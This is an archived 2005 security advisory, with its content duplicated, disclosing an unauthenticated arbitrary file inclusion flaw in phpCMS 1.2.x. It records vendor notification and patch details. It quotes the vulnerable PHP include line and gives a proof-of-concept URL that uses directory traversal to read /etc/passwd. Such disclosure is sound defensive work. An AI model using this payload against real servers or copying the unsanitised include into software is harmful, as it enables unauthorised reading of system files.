Bernhard Müller
02/06/05, 20:45
This is a MIME-formatted message. If you see this text it means that your
E-mail software does not support MIME-formatted messages.
--=_lexx-809-1117697959-0001-2
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
SEC-CONSULT Security Advisory 20050602-1
================================================== =====================
title: Arbitrary File Inclusion in phpCMS 1.2.x
program: phpCMS
vulnerable version: 1.2.0, 1.2.1, 1.2.1pl1
homepage: www.phpcms.de
found: 2005-05-31
by: sk0L / SEC-CONSULT / www.sec-consult.com
================================================== =====================
vendor description:
---------------
phpCMS is a content management system, which convinces in particular by
small
system requirements, high performance and above all its flexibility.
vulnerabilty overview:
---------------
a flaw in phpCMS makes it possible to include arbitrary files on the server.
as the "include" statement is called before any session checks occur,
this vuln
can be exploited without any prior authentication.
proof of concept:
---------------
the vulnerable include call resides in class.layout_phpcms.php:
if(isset($_GET['language']) && $_GET['language'] != '') {
include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
[...]
so you are able to do something like:
http://vu1n.com/parser/parser.php?&phpcmsaction=FILEMANAGER&language=de/../../../../../../../etc/passwd
vulnerable versions:
---------------
according to Ignatius from the phpCMS Core Team, the vulnerable code
line was introduced in phpCMS 1.2.0. older versions are not affected by
this vulnerabity.
vendor status:
---------------
vendor notified: 2005-05-31
vendor response: immediately
patch available: 2005-06-01
the vulnerabilty has been adressed in phpCMS 1.2.1pl2. additionally,
patches for the affected versions have been made available by the vendor.
http://www.phpcms.de/download/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
Bernhard Mueller / www.sec-consult.com /
SGT ::: dfa, tke, bfi, mei, flo, walter|bruder :::
~ ___ ___
~ | |=|_.' .'| .'| .'|=|`. .'|
~ `. | .' | .' .' .' | | `. .' |
==== `.|=|`. | |=|.: | | | | | | ======
~ ___ | `.| | |'. `. | | .' | | ___
~ `._|=|___||___| |_| `.|=|.' |___|=|_.
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
--=_lexx-809-1117697959-0001-2
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCS qGSIb3DQEHAQAAoIIJuzCC
AzgwggKhoAMCAQICAw6SlDANBgkqhkiG9w0BAQQFADBiMQswCQ YDVQQGEwJaQTElMCMGA1UE
ChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1 UEAxMjVGhhd3RlIFBlcnNv
bmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwHhcNMDUwNDI2MTY0MD MzWhcNMDYwNDI2MTY0MDMz
WjCBjjEQMA4GA1UEBBMHTXVlbGxlcjERMA8GA1UEKhMIQmVybm hhcmQxGTAXBgNVBAMTEEJl
cm5oYXJkIE11ZWxsZXIxKDAmBgkqhkiG9w0BCQEWGWIubXVlbG xlckBzZWMtY29uc3VsdC5j
b20xIjAgBgkqhkiG9w0BCQEWE2JtdUBzZWMtY29uc3VsdC5jb2 0wggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDhXYkOzckBSmSbVRT4VyxuFp3Sx8 TrwAbDTfzz0A5w3qQOsZDf
KQTAp2uXC/5GS3jeEnm3aEVzruSyGgG7MHdFJ9EEXKV9pOZWK0MTW4aoqDmA DTv+r5kqrZM2
wFjy2AnDejn1YKYK4vqBHcnKCToNxnxVys6Zkfp2EvWQVWIzVG Ao6r7PqcoO1stK+SCZVNyI
Iun0SjkHiTuvo1zIvaFwKzkUhS0zCbVbS86oMVTHaSYj1yt3bh ClFqVlAgAzhGKS13vf04+T
FtUdFLrS/plN1ILmGzz+ir5G+wBiXY05kZVhIhptcXt1HX5lFv5Na7jReTa V+grHnFn9FB2+
fZVNAgMBAAGjSzBJMDkGA1UdEQQyMDCBGWIubXVlbGxlckBzZW MtY29uc3VsdC5jb22BE2Jt
dUBzZWMtY29uc3VsdC5jb20wDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQQFAAOBgQBF9TFk
pk+xaS3sfVKbYgjEccz8nS+7hji/vyxbcRfCB8ppsGsJxezg8K6jyCH9MkEfESXwdyiuf6Rh
egTv73LJVXdXpbXrtZcQu/oiOMvLEnrUzHEBgdpKqUlSQdVsu0IzwlTuB6HLR1ao30olcPSo
2Ln0VKAZfGJZxcXb7/WNljCCAzgwggKhoAMCAQICAw6SlDANBgkqhkiG9w0BAQQFADBi MQsw
CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbm cgKFB0eSkgTHRkLjEsMCoG
A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3Vpbm cgQ0EwHhcNMDUwNDI2MTY0
MDMzWhcNMDYwNDI2MTY0MDMzWjCBjjEQMA4GA1UEBBMHTXVlbG xlcjERMA8GA1UEKhMIQmVy
bmhhcmQxGTAXBgNVBAMTEEJlcm5oYXJkIE11ZWxsZXIxKDAmBg kqhkiG9w0BCQEWGWIubXVl
bGxlckBzZWMtY29uc3VsdC5jb20xIjAgBgkqhkiG9w0BCQEWE2 JtdUBzZWMtY29uc3VsdC5j
b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhXY kOzckBSmSbVRT4VyxuFp3S
x8TrwAbDTfzz0A5w3qQOsZDfKQTAp2uXC/5GS3jeEnm3aEVzruSyGgG7MHdFJ9EEXKV9pOZW
K0MTW4aoqDmADTv+r5kqrZM2wFjy2AnDejn1YKYK4vqBHcnKCT oNxnxVys6Zkfp2EvWQVWIz
VGAo6r7PqcoO1stK+SCZVNyIIun0SjkHiTuvo1zIvaFwKzkUhS 0zCbVbS86oMVTHaSYj1yt3
bhClFqVlAgAzhGKS13vf04+TFtUdFLrS/plN1ILmGzz+ir5G+wBiXY05kZVhIhptcXt1HX5l
Fv5Na7jReTaV+grHnFn9FB2+fZVNAgMBAAGjSzBJMDkGA1UdEQ QyMDCBGWIubXVlbGxlckBz
ZWMtY29uc3VsdC5jb22BE2JtdUBzZWMtY29uc3VsdC5jb20wDA YDVR0TAQH/BAIwADANBgkq
hkiG9w0BAQQFAAOBgQBF9TFkpk+xaS3sfVKbYgjEccz8nS+7hj i/vyxbcRfCB8ppsGsJxezg
8K6jyCH9MkEfESXwdyiuf6RhegTv73LJVXdXpbXrtZcQu/oiOMvLEnrUzHEBgdpKqUlSQdVs
u0IzwlTuB6HLR1ao30olcPSo2Ln0VKAZfGJZxcXb7/WNljCCAz8wggKooAMCAQICAQ0wDQYJ
KoZIhvcNAQEFBQAwgdExCzAJBgNVBAYTAlpBMRUwEwYDVQQIEw xXZXN0ZXJuIENhcGUxEjAQ
BgNVBAcTCUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbn N1bHRpbmcxKDAmBgNVBAsT
H0NlcnRpZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBg NVBAMTG1RoYXd0ZSBQZXJz
b25hbCBGcmVlbWFpbCBDQTErMCkGCSqGSIb3DQEJARYccGVyc2 9uYWwtZnJlZW1haWxAdGhh
d3RlLmNvbTAeFw0wMzA3MTcwMDAwMDBaFw0xMzA3MTYyMzU5NT laMGIxCzAJBgNVBAYTAlpB
MSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdG QuMSwwKgYDVQQDEyNUaGF3
dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQTCBnzANBg kqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAxKY8VXNV+065yplaHmjAdQRwnd/p/6Me7L3N9VvyGna9fww6YfK/Uc4B1OVQCjDX
AmNaLIkVcI7dyfArhVqqP3FWy688Cwfn8R+RNiQqE88r1fOCdz 0Dviv+uxg+B79AgAJk16em
u59l0cUqVIUPSAR/p7bRPGEEQB5kGXJgt/sCAwEAAaOBlDCBkTASBgNVHRMBAf8ECDAGAQH/
AgEAMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6Ly9jcmwudGhhd3 RlLmNvbS9UaGF3dGVQZXJz
b25hbEZyZWVtYWlsQ0EuY3JsMAsGA1UdDwQEAwIBBjApBgNVHR EEIjAgpB4wHDEaMBgGA1UE
AxMRUHJpdmF0ZUxhYmVsMi0xMzgwDQYJKoZIhvcNAQEFBQADgY EASIzRUIPqCy7MDaNmrGcP
f6+svsIXoUOWlJ1/TCG4+DYfqi2fNi/A9BxQIJNwPP2t4WFiw9k6GX6EsZkbAMUaC4J0niVQ
lGLH2ydxVyWN3amcOY6MIE9lX5Xa9/eH1sYITq726jTlEBpbNU1341YheILcIRk13iSx0x1G
/11fZU8xggM7MIIDNwIBATBpMGIxCzAJBgNVBAYTAlpBMSUwIwY DVQQKExxUaGF3dGUgQ29u
c3VsdGluZyAoUHR5KSBMdGQuMSwwKgYDVQQDEyNUaGF3dGUgUG Vyc29uYWwgRnJlZW1haWwg
SXNzdWluZyBDQQIDDpKUMAkGBSsOAwIaBQCgggGnMBgGCSqGSI b3DQEJAzELBgkqhkiG9w0B
BwEwHAYJKoZIhvcNAQkFMQ8XDTA1MDYwMjA3NDQwOVowIwYJKo ZIhvcNAQkEMRYEFPkeNR2G
0AuQ0hd2O2snHGTbFo1nMFIGCSqGSIb3DQEJDzFFMEMwCgYIKo ZIhvcNAwcwDgYIKoZIhvcN
AwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSI b3DQMCAgEoMHgGCSsGAQQB
gjcQBDFrMGkwYjELMAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYX d0ZSBDb25zdWx0aW5nIChQ
dHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBGcm VlbWFpbCBJc3N1aW5nIENB
AgMOkpQwegYLKoZIhvcNAQkQAgsxa6BpMGIxCzAJBgNVBAYTAl pBMSUwIwYDVQQKExxUaGF3
dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQuMSwwKgYDVQQDEyNUaG F3dGUgUGVyc29uYWwgRnJl
ZW1haWwgSXNzdWluZyBDQQIDDpKUMA0GCSqGSIb3DQEBAQUABI IBAMlD6eihtlZifYL3WwKb
8L3i+RymykVE+U879/9oX4EYrEvgYNWJ7v8v6gzUY7+zoFmMIiuDi9HYYKEZ+cKssZ1u MBzx
yf76+Ejiq/nQU2nt+8XiLLEaTJup6K2DHPLJ/0xESDANpXfe5bqpin7DVDM/w0pdP5z9sjvD
ph3bd+uuVUHBtFuqIC7fn1G5zHRe81sJTJY7Mo/dOYZ66/XE3WM1NPGbC9KNEJhVGIzpfr+L
kX32t0vuNN6eBy7LTM67oVi1GXclgku9qe6tmZtyZ+hoKTf7gX W0mq8kwWYm0SmLcbvP2D4p
FKIKYmT/DSmIxz+TH8xVijV/oJFosMEcJ9wAAAAAAAA=
--=_lexx-809-1117697959-0001-2--
E-mail software does not support MIME-formatted messages.
--=_lexx-809-1117697959-0001-2
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
SEC-CONSULT Security Advisory 20050602-1
================================================== =====================
title: Arbitrary File Inclusion in phpCMS 1.2.x
program: phpCMS
vulnerable version: 1.2.0, 1.2.1, 1.2.1pl1
homepage: www.phpcms.de
found: 2005-05-31
by: sk0L / SEC-CONSULT / www.sec-consult.com
================================================== =====================
vendor description:
---------------
phpCMS is a content management system, which convinces in particular by
small
system requirements, high performance and above all its flexibility.
vulnerabilty overview:
---------------
a flaw in phpCMS makes it possible to include arbitrary files on the server.
as the "include" statement is called before any session checks occur,
this vuln
can be exploited without any prior authentication.
proof of concept:
---------------
the vulnerable include call resides in class.layout_phpcms.php:
if(isset($_GET['language']) && $_GET['language'] != '') {
include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
[...]
so you are able to do something like:
http://vu1n.com/parser/parser.php?&phpcmsaction=FILEMANAGER&language=de/../../../../../../../etc/passwd
vulnerable versions:
---------------
according to Ignatius from the phpCMS Core Team, the vulnerable code
line was introduced in phpCMS 1.2.0. older versions are not affected by
this vulnerabity.
vendor status:
---------------
vendor notified: 2005-05-31
vendor response: immediately
patch available: 2005-06-01
the vulnerabilty has been adressed in phpCMS 1.2.1pl2. additionally,
patches for the affected versions have been made available by the vendor.
http://www.phpcms.de/download/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~
Bernhard Mueller / www.sec-consult.com /
SGT ::: dfa, tke, bfi, mei, flo, walter|bruder :::
~ ___ ___
~ | |=|_.' .'| .'| .'|=|`. .'|
~ `. | .' | .' .' .' | | `. .' |
==== `.|=|`. | |=|.: | | | | | | ======
~ ___ | `.| | |'. `. | | .' | | ___
~ `._|=|___||___| |_| `.|=|.' |___|=|_.
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-
--=_lexx-809-1117697959-0001-2
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCS qGSIb3DQEHAQAAoIIJuzCC
AzgwggKhoAMCAQICAw6SlDANBgkqhkiG9w0BAQQFADBiMQswCQ YDVQQGEwJaQTElMCMGA1UE
ChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1 UEAxMjVGhhd3RlIFBlcnNv
bmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwHhcNMDUwNDI2MTY0MD MzWhcNMDYwNDI2MTY0MDMz
WjCBjjEQMA4GA1UEBBMHTXVlbGxlcjERMA8GA1UEKhMIQmVybm hhcmQxGTAXBgNVBAMTEEJl
cm5oYXJkIE11ZWxsZXIxKDAmBgkqhkiG9w0BCQEWGWIubXVlbG xlckBzZWMtY29uc3VsdC5j
b20xIjAgBgkqhkiG9w0BCQEWE2JtdUBzZWMtY29uc3VsdC5jb2 0wggEiMA0GCSqGSIb3DQEB
AQUAA4IBDwAwggEKAoIBAQDhXYkOzckBSmSbVRT4VyxuFp3Sx8 TrwAbDTfzz0A5w3qQOsZDf
KQTAp2uXC/5GS3jeEnm3aEVzruSyGgG7MHdFJ9EEXKV9pOZWK0MTW4aoqDmA DTv+r5kqrZM2
wFjy2AnDejn1YKYK4vqBHcnKCToNxnxVys6Zkfp2EvWQVWIzVG Ao6r7PqcoO1stK+SCZVNyI
Iun0SjkHiTuvo1zIvaFwKzkUhS0zCbVbS86oMVTHaSYj1yt3bh ClFqVlAgAzhGKS13vf04+T
FtUdFLrS/plN1ILmGzz+ir5G+wBiXY05kZVhIhptcXt1HX5lFv5Na7jReTa V+grHnFn9FB2+
fZVNAgMBAAGjSzBJMDkGA1UdEQQyMDCBGWIubXVlbGxlckBzZW MtY29uc3VsdC5jb22BE2Jt
dUBzZWMtY29uc3VsdC5jb20wDAYDVR0TAQH/BAIwADANBgkqhkiG9w0BAQQFAAOBgQBF9TFk
pk+xaS3sfVKbYgjEccz8nS+7hji/vyxbcRfCB8ppsGsJxezg8K6jyCH9MkEfESXwdyiuf6Rh
egTv73LJVXdXpbXrtZcQu/oiOMvLEnrUzHEBgdpKqUlSQdVsu0IzwlTuB6HLR1ao30olcPSo
2Ln0VKAZfGJZxcXb7/WNljCCAzgwggKhoAMCAQICAw6SlDANBgkqhkiG9w0BAQQFADBi MQsw
CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbm cgKFB0eSkgTHRkLjEsMCoG
A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3Vpbm cgQ0EwHhcNMDUwNDI2MTY0
MDMzWhcNMDYwNDI2MTY0MDMzWjCBjjEQMA4GA1UEBBMHTXVlbG xlcjERMA8GA1UEKhMIQmVy
bmhhcmQxGTAXBgNVBAMTEEJlcm5oYXJkIE11ZWxsZXIxKDAmBg kqhkiG9w0BCQEWGWIubXVl
bGxlckBzZWMtY29uc3VsdC5jb20xIjAgBgkqhkiG9w0BCQEWE2 JtdUBzZWMtY29uc3VsdC5j
b20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDhXY kOzckBSmSbVRT4VyxuFp3S
x8TrwAbDTfzz0A5w3qQOsZDfKQTAp2uXC/5GS3jeEnm3aEVzruSyGgG7MHdFJ9EEXKV9pOZW
K0MTW4aoqDmADTv+r5kqrZM2wFjy2AnDejn1YKYK4vqBHcnKCT oNxnxVys6Zkfp2EvWQVWIz
VGAo6r7PqcoO1stK+SCZVNyIIun0SjkHiTuvo1zIvaFwKzkUhS 0zCbVbS86oMVTHaSYj1yt3
bhClFqVlAgAzhGKS13vf04+TFtUdFLrS/plN1ILmGzz+ir5G+wBiXY05kZVhIhptcXt1HX5l
Fv5Na7jReTaV+grHnFn9FB2+fZVNAgMBAAGjSzBJMDkGA1UdEQ QyMDCBGWIubXVlbGxlckBz
ZWMtY29uc3VsdC5jb22BE2JtdUBzZWMtY29uc3VsdC5jb20wDA YDVR0TAQH/BAIwADANBgkq
hkiG9w0BAQQFAAOBgQBF9TFkpk+xaS3sfVKbYgjEccz8nS+7hj i/vyxbcRfCB8ppsGsJxezg
8K6jyCH9MkEfESXwdyiuf6RhegTv73LJVXdXpbXrtZcQu/oiOMvLEnrUzHEBgdpKqUlSQdVs
u0IzwlTuB6HLR1ao30olcPSo2Ln0VKAZfGJZxcXb7/WNljCCAz8wggKooAMCAQICAQ0wDQYJ
KoZIhvcNAQEFBQAwgdExCzAJBgNVBAYTAlpBMRUwEwYDVQQIEw xXZXN0ZXJuIENhcGUxEjAQ
BgNVBAcTCUNhcGUgVG93bjEaMBgGA1UEChMRVGhhd3RlIENvbn N1bHRpbmcxKDAmBgNVBAsT
H0NlcnRpZmljYXRpb24gU2VydmljZXMgRGl2aXNpb24xJDAiBg NVBAMTG1RoYXd0ZSBQZXJz
b25hbCBGcmVlbWFpbCBDQTErMCkGCSqGSIb3DQEJARYccGVyc2 9uYWwtZnJlZW1haWxAdGhh
d3RlLmNvbTAeFw0wMzA3MTcwMDAwMDBaFw0xMzA3MTYyMzU5NT laMGIxCzAJBgNVBAYTAlpB
MSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdG QuMSwwKgYDVQQDEyNUaGF3
dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQTCBnzANBg kqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAxKY8VXNV+065yplaHmjAdQRwnd/p/6Me7L3N9VvyGna9fww6YfK/Uc4B1OVQCjDX
AmNaLIkVcI7dyfArhVqqP3FWy688Cwfn8R+RNiQqE88r1fOCdz 0Dviv+uxg+B79AgAJk16em
u59l0cUqVIUPSAR/p7bRPGEEQB5kGXJgt/sCAwEAAaOBlDCBkTASBgNVHRMBAf8ECDAGAQH/
AgEAMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6Ly9jcmwudGhhd3 RlLmNvbS9UaGF3dGVQZXJz
b25hbEZyZWVtYWlsQ0EuY3JsMAsGA1UdDwQEAwIBBjApBgNVHR EEIjAgpB4wHDEaMBgGA1UE
AxMRUHJpdmF0ZUxhYmVsMi0xMzgwDQYJKoZIhvcNAQEFBQADgY EASIzRUIPqCy7MDaNmrGcP
f6+svsIXoUOWlJ1/TCG4+DYfqi2fNi/A9BxQIJNwPP2t4WFiw9k6GX6EsZkbAMUaC4J0niVQ
lGLH2ydxVyWN3amcOY6MIE9lX5Xa9/eH1sYITq726jTlEBpbNU1341YheILcIRk13iSx0x1G
/11fZU8xggM7MIIDNwIBATBpMGIxCzAJBgNVBAYTAlpBMSUwIwY DVQQKExxUaGF3dGUgQ29u
c3VsdGluZyAoUHR5KSBMdGQuMSwwKgYDVQQDEyNUaGF3dGUgUG Vyc29uYWwgRnJlZW1haWwg
SXNzdWluZyBDQQIDDpKUMAkGBSsOAwIaBQCgggGnMBgGCSqGSI b3DQEJAzELBgkqhkiG9w0B
BwEwHAYJKoZIhvcNAQkFMQ8XDTA1MDYwMjA3NDQwOVowIwYJKo ZIhvcNAQkEMRYEFPkeNR2G
0AuQ0hd2O2snHGTbFo1nMFIGCSqGSIb3DQEJDzFFMEMwCgYIKo ZIhvcNAwcwDgYIKoZIhvcN
AwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSI b3DQMCAgEoMHgGCSsGAQQB
gjcQBDFrMGkwYjELMAkGA1UEBhMCWkExJTAjBgNVBAoTHFRoYX d0ZSBDb25zdWx0aW5nIChQ
dHkpIEx0ZC4xLDAqBgNVBAMTI1RoYXd0ZSBQZXJzb25hbCBGcm VlbWFpbCBJc3N1aW5nIENB
AgMOkpQwegYLKoZIhvcNAQkQAgsxa6BpMGIxCzAJBgNVBAYTAl pBMSUwIwYDVQQKExxUaGF3
dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQuMSwwKgYDVQQDEyNUaG F3dGUgUGVyc29uYWwgRnJl
ZW1haWwgSXNzdWluZyBDQQIDDpKUMA0GCSqGSIb3DQEBAQUABI IBAMlD6eihtlZifYL3WwKb
8L3i+RymykVE+U879/9oX4EYrEvgYNWJ7v8v6gzUY7+zoFmMIiuDi9HYYKEZ+cKssZ1u MBzx
yf76+Ejiq/nQU2nt+8XiLLEaTJup6K2DHPLJ/0xESDANpXfe5bqpin7DVDM/w0pdP5z9sjvD
ph3bd+uuVUHBtFuqIC7fn1G5zHRe81sJTJY7Mo/dOYZ66/XE3WM1NPGbC9KNEJhVGIzpfr+L
kX32t0vuNN6eBy7LTM67oVi1GXclgku9qe6tmZtyZ+hoKTf7gX W0mq8kwWYm0SmLcbvP2D4p
FKIKYmT/DSmIxz+TH8xVijV/oJFosMEcJ9wAAAAAAAA=
--=_lexx-809-1117697959-0001-2--